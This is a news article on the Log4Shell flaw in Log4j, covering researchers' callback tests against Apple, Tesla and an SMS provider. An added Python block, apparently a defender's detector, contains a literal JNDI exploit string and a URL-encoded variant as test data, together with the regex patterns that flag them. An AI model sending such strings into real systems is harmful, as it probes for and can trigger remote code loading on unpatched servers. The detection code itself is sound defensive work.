Posted December 15, 2021, 11:51
Security researchers studying the recently discovered and "extremely bad" Log4Shell exploit claim to have used it on devices as varied as iPhones and Tesla cars. According to screenshots shared online, changing the device name of an iPhone or a Tesla to a special exploit string was enough to trigger a ping from Apple or Tesla servers, indicating that the server at the other end was vulnerable to Log4Shell.
In the demonstrations, the researchers changed the device names to a string that would send the servers to a test URL, exploiting the behavior enabled by the vulnerability. After the name change, incoming traffic showed URL requests from IP addresses belonging to Apple and, in the case of Tesla, to China Unicom, the company's mobile service partner for the Chinese market. In short, the researchers induced Apple's and Tesla's servers to visit a URL of their choice.
The iPhone demonstration comes from a Dutch security researcher; the other was downloaded from the anonymous log4jattacksurface GitHub repository.
Assuming the images are authentic, they show behavior (the loading of remote resources) that should not be possible with text contained in a device name. This proof of concept has given rise to many reports indicating that Apple and Tesla are vulnerable to the exploit.
While the demonstration is alarming, its usefulness to cybercriminals is not obvious. In theory, an attacker could host malware at the target URL in order to infect vulnerable servers, but a well-maintained network could prevent such an attack at the network level. More generally, nothing indicates that the method could lead to a broader compromise of Apple or Tesla systems. (Neither company responded to an emailed request for comment at the time of publication.)
Nevertheless, this is a reminder of the complex nature of technological systems, which almost always depend on code from third-party libraries. The Log4Shell exploit affects an open-source Java tool called Log4j that is widely used for application event logging. It is not yet known exactly how many devices are affected, but researchers believe the number is in the millions, including obscure systems that are rarely targeted by attacks of this nature.
The full extent of exploitation in the wild is not known, but in a blog post, the digital forensics platform Cado reported that it had detected servers trying to use this method to install Mirai botnet code.
Log4Shell is all the more serious because it is relatively easy to exploit. The vulnerability works by tricking the application into interpreting a piece of text as a link to a remote resource and trying to retrieve that resource instead of recording the text as written. All that is required is for a vulnerable device to record the special string in its application logs.
This creates potential for vulnerability in many systems that accept user input, since message text can be stored in logs. The Log4j vulnerability was first identified in Minecraft servers, which attackers could compromise using chat messages; systems that send and receive other message formats, such as SMS, are also vulnerable.
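An added example, not part of the original article: one way a defender could flag the special string described above in user-supplied text before or after it reaches the logs. It assumes the string uses Log4j's `${...}` lookup syntax with the `jndi` lookup (neither is named in the article); the records, field names and host are constructed.

```python
import re
from urllib.parse import unquote

# Assumption: Log4j lookup expressions open with "${"; the remote-resource
# variant uses the "jndi" lookup. Matching the opener as well as the keyword
# keeps the check useful when the keyword itself is not written literally.
LOOKUP_OPENER = re.compile(r"\$\{")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed records: (field, user-controlled text the application would log).
SAMPLE_RECORDS = [
    ("device_name", "Anna's iPhone"),
    ("device_name", "${jndi:ldap://callback.example.invalid/a}"),
    ("chat_message", "price is ${amount} dollars"),
    ("http_path", "/search?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fa%7D"),
    ("sms_body", "See you at 6 {ok}"),
]

def normalize(text):
    """Undo up to two rounds of URL encoding so an encoded opener is visible."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(text):
    """Return 'jndi', 'lookup' or 'clean' for one user-controlled string."""
    text = normalize(text)
    if JNDI_LOOKUP.search(text):
        return "jndi"      # remote-resource lookup: treat as an exploit attempt
    if LOOKUP_OPENER.search(text):
        return "lookup"    # some other lookup expression: needs review
    return "clean"

def scan(records):
    """Return (field, verdict, text) for every record that is not clean."""
    results = []
    for field, text in records:
        verdict = classify(text)
        if verdict != "clean":
            results.append((field, verdict, text))
    return results

if __name__ == "__main__":
    for field, verdict, text in scan(SAMPLE_RECORDS):
        print(f"{verdict:6} {field:12} {text}")
```

A hit in a field such as a device name or SMS body is worth alerting on regardless of whether the receiving server is patched, because it shows someone probing for the flaw.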
According to tests carried out by The Verge, at least one large SMS provider appears to be vulnerable to the exploit. When sent to numbers operated by the SMS provider, text messages containing exploit code triggered a response from the company's servers that revealed information about the IP address and host name, which suggests that the servers could be tricked into executing malicious code. Calls and emails to the company concerned remained unanswered at the time of publication.
An update to the Log4j library has been published to mitigate the vulnerability, but applying fixes to all vulnerable machines will take time, given the difficulties of updating enterprise software at scale.